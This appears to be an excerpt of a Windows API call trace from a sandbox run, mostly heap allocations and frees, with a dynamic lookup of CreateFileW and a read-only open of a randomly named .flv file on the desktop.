[0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0132.290] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0132.290] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.291] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.291] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0132.292] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0132.293] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0132.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0132.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0132.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caf40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0132.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.293] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0132.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0132.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0132.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0132.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0132.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0132.293] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0132.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0132.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0132.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0132.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0132.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0132.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0132.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\jk_t2yqtjjg2-b-hh.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0132.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0132.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0132.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0132.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.346] FreeLibrary (hLibModule=0x772d0000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0132.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.347] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0132.347] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0132.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.348] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0132.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 